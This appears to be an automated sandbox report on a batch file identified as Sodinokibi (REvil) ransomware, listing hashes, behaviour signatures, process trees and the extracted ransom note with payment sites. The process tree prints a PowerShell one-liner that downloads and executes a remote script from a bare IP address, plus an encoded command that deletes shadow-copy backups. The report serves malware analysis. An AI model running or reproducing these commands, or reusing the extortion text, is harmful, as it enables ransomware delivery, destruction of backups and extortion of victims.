Overview

overview

10

Static

static

GxdgNtfB.bat

windows7_x64

10

GxdgNtfB.bat

windows10_x64

10

Analysis

  • max time kernel
    142s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    29-02-2020 23:10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    GxdgNtfB.bat

  • Size

    192B

  • MD5

    d40190448142e92524fc41e756e185b6

  • SHA1

    399ead1022291c86a66bf5bfcf1e7229287b5721

  • SHA256

    7d300da6df98325755580525ea2039cd8d4c9420557fb992d83440840bdcbd25

  • SHA512

    90361f11344ac7acbb897c55ffeddbc8695130c75e05b909bd72652f024416ffe8fc7f1040affa5dcf68f7e0c48958695ad85a928a323fb4bab671b4df5170b8

Score
10/10
ransomwarepersistenceevasionspywaretrojansodinokibi

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/GxdgNtfB

Extracted

Path

C:\lqdsy55g-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension lqdsy55g. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/43E3E340647DF886 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/43E3E340647DF886 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: BGXCSLIHW5L8q3vuJ1B+xKfHEIduq94RBq9GDHkOkUZzkQJn/abr8PfnAOUJ0Dii f5oBAiFGaE2KNmM3sVthI63W/HyYbfx3oIQpq1nd8he9GpNzTX/6O4jaIEpKZMwf R8DR9U2wrM95qOi96ZNwoEkpiF4wQAzGEAG7fIO3CyUsuRYOEyUaG3HCX1jDpDue fL7FMPwYrHEJHLUgF6DmZaKcjvInvAp/ruQW/pk/aErtEe9VA1l8U9NpJlshEWia KA01ctMntfHYVI6w3wR52dIVk7O1icxhg9IXNRZW8Vt6cVi8YuBYu8rteDFApKDU U/IhPzIK11jGv1LbnYw5EPeI8o0nY9Ay9vl2tYGmoFQ2G/Y8CyxdFOXLJK5lJJo8 iQ1X/TYzJOW02Kk6Us+HsQ28HLleWuliHyfq0G3Foa4knZLYVZnIBvTF3b/1qYU5 x7pSj0rtiBV1o8Zd52gLKZCab83PM6J5j17q9gBSRkZUAS2yPkbABBeciZoYAVsE Tn26xhN6jhfu0cH/7D8t8cOB0dOxYcuvvWMATAVaNeZiyAr17avMi22GsWnJKdZ+ 7UKgXLZ0kdHcEeSaoZ+t4F51STyYhHMAsEFTRpU6VaXLygfBjnjkt3GDD+ceXODe A/nR6LE5PCnJrtnzeApEKdJLWKUgJPveyzoLiRSQ4192eKip808XRlu5Hj/6Mh6r PC5GCWfsK9M1OJpWxdCxTvzWYJSKboSDEtHnR0i8Z6+Qjc9gCGK7zfL+t8GQam7r 2qzx+HEMKPsIbjC3s16UY4k8nR0ER/IDMUVKSMabswGlrLL9qqOd9OY4KA5ccPoP RaBx+BLyeaUZ5+h8Vi9D9c6PQqaFmBbg37QkllktmAQK23MPKHqaa9uINBIWHAfZ gYFCvkfArOVhcNsbnc7qY8XRnOjXRK0a8VE/yEpioNNvm90q7RuUeBOxTWCV/2w0 10I6dSz/878sXSyXBKhgsuGNkx6S7xLXGwP6urvEmrd8ae1lWh1c72AZQTStbBmx Oa7Q6ngZXEMymJKG3a3/R5p2aMKcUiqLot0Ep5LYrfzIECexC45zTAgfiY3AvHGK LIT/1OfD3fdFyrZ9Oz1ATO2VBQwBVeeNT9dtSBQQc+ukicVCHCr82Y9JOQc1hdhw vJWEaHp9o2G1qgos4RhKmz9OY+lPnHuIkley3prtJOsCJJmm6FHrMshrEOFr4JzI XE1Lp1HTlNyPw7RuTGDvrZVc0K6lYckbt4ElJOGm0Lqk0THsYSfKQX+c/E1UKrKx XlqZlxCCQfnzo/aBdEt1cj2bz566NqMdAlrTbaEHgoPm+Joo ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/43E3E340647DF886

http://decryptor.cc/43E3E340647DF886

Signatures

  • Discovering connected drives 3 TTPs 7 IoCs
    ransomware
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Blacklisted process makes network request 121 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\GxdgNtfB.bat"
    1⤵
    • Discovering connected drives
    • Suspicious use of WriteProcessMemory
    PID:1904
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/GxdgNtfB');Invoke-YDVXUJVMC;Start-Sleep -s 10000"
      2⤵
      • Discovering connected drives
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Drops file in System32 directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:1928
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Discovering connected drives
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:2028
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1556

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit